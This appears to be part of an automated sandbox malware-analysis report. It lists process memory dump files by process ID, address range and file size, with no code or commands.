memory/4732-105-0x00000241F1216000-0x00000241F1218000-memory.dmpFilesize
8KB
-
memory/4732-80-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmpFilesize
9.9MB
-
memory/4764-81-0x0000000000000000-mapping.dmp
-
memory/4820-45-0x0000000000000000-mapping.dmp
-
memory/4844-124-0x000001ECB3DE8000-0x000001ECB3DE9000-memory.dmpFilesize
4KB
-
memory/4844-106-0x000001ECB3DE6000-0x000001ECB3DE8000-memory.dmpFilesize
8KB
-
memory/4844-86-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmpFilesize
9.9MB
-
memory/4844-88-0x000001ECB3DE0000-0x000001ECB3DE2000-memory.dmpFilesize
8KB
-
memory/4844-84-0x0000000000000000-mapping.dmp
-
memory/4844-89-0x000001ECB3DE3000-0x000001ECB3DE5000-memory.dmpFilesize
8KB
-
memory/4844-156-0x000001ECB6B30000-0x000001ECB6B50000-memory.dmpFilesize
128KB
-
memory/4844-155-0x000001ECB3DE9000-0x000001ECB3DEF000-memory.dmpFilesize
24KB
-
memory/4928-115-0x0000000000000000-mapping.dmp
-
memory/4932-46-0x000001FC32CB0000-0x000001FC32CB1000-memory.dmpFilesize
4KB
-
memory/4932-47-0x000001FC32CB0000-0x000001FC32CB1000-memory.dmpFilesize
4KB
-
memory/4956-57-0x0000000000000000-mapping.dmp
-
memory/4976-58-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmpFilesize
9.9MB
-
memory/4976-59-0x00000228D8EB0000-0x00000228D8EB2000-memory.dmpFilesize
8KB
-
memory/4976-60-0x00000228D8EB3000-0x00000228D8EB5000-memory.dmpFilesize
8KB
-
memory/4976-63-0x00000228D8EB6000-0x00000228D8EB8000-memory.dmpFilesize
8KB
-
memory/4984-120-0x0000000000000000-mapping.dmp
-
memory/5016-139-0x00000173DD110000-0x00000173DD111000-memory.dmpFilesize
4KB
-
memory/5016-100-0x00000173F56E3000-0x00000173F56E5000-memory.dmpFilesize
8KB
-
memory/5016-93-0x0000000000000000-mapping.dmp
-
memory/5016-97-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmpFilesize
9.9MB
-
memory/5016-98-0x00000173F56E0000-0x00000173F56E2000-memory.dmpFilesize
8KB
-
memory/5016-107-0x00000173F56E6000-0x00000173F56E8000-memory.dmpFilesize
8KB
-
memory/5052-49-0x0000000000000000-mapping.dmp
-
memory/5072-53-0x0000019623A13000-0x0000019623A15000-memory.dmpFilesize
8KB
-
memory/5072-55-0x0000019623A16000-0x0000019623A18000-memory.dmpFilesize
8KB
-
memory/5072-65-0x000001963EED0000-0x000001963EED1000-memory.dmpFilesize
4KB
-
memory/5072-51-0x0000019623A10000-0x0000019623A12000-memory.dmpFilesize
8KB
-
memory/5072-50-0x00007FF8E9F70000-0x00007FF8EA95C000-memory.dmpFilesize
9.9MB
-
memory/5072-72-0x0000019623A18000-0x0000019623A19000-memory.dmpFilesize
4KB
-
memory/5072-73-0x0000019623A19000-0x0000019623A1F000-memory.dmpFilesize
24KB
-
memory/5072-71-0x00007FF7D9220000-0x00007FF7D9221000-memory.dmpFilesize
4KB
-
memory/5072-70-0x000001963E8C0000-0x000001963E8C1000-memory.dmpFilesize
4KB
-
memory/5072-69-0x000001963E7F0000-0x000001963E7F1000-memory.dmpFilesize
4KB
-
memory/5072-68-0x000001963E750000-0x000001963E751000-memory.dmpFilesize
4KB